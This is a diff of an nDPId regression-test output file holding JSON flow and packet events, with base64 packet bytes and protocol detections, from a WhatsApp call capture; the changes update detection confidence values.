+00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238792,"flow_last_seen":1432582238792,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238792,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1432582238792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238792,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaWaMAAEAR4QbAqAIEHw1dMMk+DZYAhleUAAMAaiESpEIAAOhOyhcXEAbXGlxAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238792,"flow_last_seen":1432582238792,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238792,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1432582238792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238792,"pkt":"xiwDYGpkAPS5Jrv0CABFwACagnUAAEARzDTAqAIEHw1JMMk+DZYAhhoqAAMAaiESpEIAABpmz0oddRqYGlZAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238792,"flow_last_seen":1432582238792,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238792,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238792,"flow_last_seen":1432582238792,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238792,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1432582238792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238792,"pkt":"xiwDYGpkAPS5Jrv0CABFwACakcIAAEARvOfAqAIEHw1JMMk+DZYAhhoqAAMAaiESpEIAABpmz0oddRqYGlZAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1432582238857,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582238857,"pkt":"APS5Jrv0xiwDYGpkCABFAABI28gAAFURZ\/MfDUAwwKgCBA2WyT4ANKxZAQMAGCESpEIAAN5oNK0Wc\/NrxVUAIAAIAAGRdm4xsYdAAgAIAAABTYyOMnU="} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1432582238878,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582238878,"pkt":"APS5Jrv0xiwDYGpkCABFAABIJlcAAFMRBGUfDVswwKgCBA2WyT4ANP0WAQMAGCESpEIAAJhbSrigEVALo04AIAAIAAGRdm4xsYdAAgAIAAABTYyOMoM="} @@ -148,10 +148,10 @@ 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1432582245576,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582245576,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo\/ZBAAEAGBN\/AqAIEEaxkCMAPAbv4S5DkkuqnVFAQ\/\/\/yOQAA"} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582246280,"flow_last_seen":1432582246280,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582246280,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01131{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1432582246280,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1432582246280,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAISN8UAAEARusXAqAIBwKgC\/0RcRFwB\/jsJeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":281,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582246280,"flow_last_seen":1432582246280,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582246280,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":281,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582246280,"flow_last_seen":1432582246280,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582246280,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582247125,"flow_last_seen":1432582247125,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582247125,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1432582247125,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582247125,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABIu7MAAEAROKHAqAIBwKgC\/+EV4RUANKgAU3BvdFVkcDCYJeGQmjjiDQABAARIlcID1NylhjSgAeWF26p2NNVFJFGe2SE="} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582247125,"flow_last_seen":1432582247125,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582247125,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582247125,"flow_last_seen":1432582247125,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582247125,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582249235,"flow_last_seen":1432582249235,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582249235,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1432582249235,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582249235,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0VdFAAEAGLmvAqAIEXT6WncAqAbtp\/2UpB8hbNoARIADD5gAAAQEICi36g7kNLSlg"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582249235,"flow_last_seen":1432582249235,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582249235,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -166,77 +166,77 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1432582250618,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582250618,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAotpxAAEAGIdPAqAIEEaeODcAwAbsLr3wlAQ2ywVAQ\/\/9P5QAA"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":334,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258587,"flow_last_seen":1432582258587,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582258587,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1432582258587,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582258587,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIJ6AAAEARMxjAqAIEAcJav8k+65gANBimAAEAGCESpEI2xNtJG9sue8sIM0EACAAU5G1owzzn9g07DgjX0q3CWkGBWA0="} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258587,"flow_last_seen":1432582258587,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582258587,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258587,"flow_last_seen":1432582258587,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582258587,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258730,"flow_last_seen":1432582258730,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582258730,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":51518,"dst_port":9344,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1432582258730,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582258730,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIG0oAAEARj7DAqAIEW\/2wQck+JIAANKXrAAEAGCESpELdaIZ9jcVOA62tiygACAAUhE7qa\/gs1xldMnASKkUclFJWums="} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258730,"flow_last_seen":1432582258730,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582258730,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":51518,"dst_port":9344,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258730,"flow_last_seen":1432582258730,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582258730,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":51518,"dst_port":9344,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1432582258815,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582258815,"pkt":"APS5Jrv0xiwDYGpkCABFAABI4nIAAC8R2kdb\/bBBwKgCBCSAyT4ANOAtAQEAGCESpELdaIZ9jcVOA62tiygACAAUsHui2xBS6T5qw9kAv9V6SryCnE8="} 00856{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1432582258825,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1432582258825,"pkt":"xiwDYGpkAPS5Jrv0CABFwAFIgM0AAEARKS3AqAIEW\/2wQck+JIABNDV+gPhBLgAAPABUWSgkrOczzTmmNaWeHGyeFn5K8vlkangPxwACY7IwMpCpL5qUBEDYknjmXwiwt1Sg\/GoDEpuWps7K3BPScguv1CoIPKC+VL4kk69VBQy2eU1f6p0OhYSXKAcM\/9HmK5KZeJJnhjzxZ+J\/AtWZs+X8uDaujdvMYKyUONaU\/07PQLiEd81h3NGLNxCpTNYPkmMGXMy1y+UaiUzN89zB2\/RkHbLVqN6e+nvnnRR2frMRlVsFWAJQmXtD929e1+a2u\/RdJfu15HCbSLl3jTXDbl84mpeVYYxkc3LSpxB7HrCYZEpYcCniVsfACmA6zpHVbv1BlaoQu+KuUWJT2eQ73+Vh12sP5aPix21kFcGvLfE3UalmxPkTCEhiCOUQRQbTvOcEo103"} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1432582259254,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582259254,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIbNAAAEAR7efAqAIEAcJav8k+65gANKlVAAEAGCESpEKmTTdqxAPLVFlkZFwACAAUe9SyVdo3\/CPkaMOU00d3jUs\/Tzg="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1432582259886,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582259886,"pkt":"xiwDYGpkAPS5Jrv0CABFwABI77MAAEARawTAqAIEAcJav8k+65gANKqSAAEAGCESpEK30Ms3\/7rzJdDOeSQACAAUjiMqFpbreAaLOXedI1Eon++y9eE="} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":826,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582267983,"flow_last_seen":1432582267983,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1432582267983,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1432582267983,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1432582267983,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA44FwAAEABy33AqAIEW\/2wQQMDDx4AAAAARQAANHIMAAAvEUrCW\/2wQcCoAgQkgMk+ACAAAA=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":826,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582267983,"flow_last_seen":1432582267983,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1432582267983,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.105516} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":826,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582267983,"flow_last_seen":1432582267983,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1432582267983,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.105516} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":828,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1432582267990,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1432582267990,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA4yYsAAEAB4k7AqAIEW\/2wQQMDDx8AAAAARQAAM4K1AAAvEToaW\/2wQcCoAgQkgMk+AB8AAA=="} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":830,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1432582267992,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1432582267992,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA4J2kAAEABhHHAqAIEW\/2wQQMDDx8AAAAARQAAM6fUAAAvERT7W\/2wQcCoAgQkgMk+AB8AAA=="} 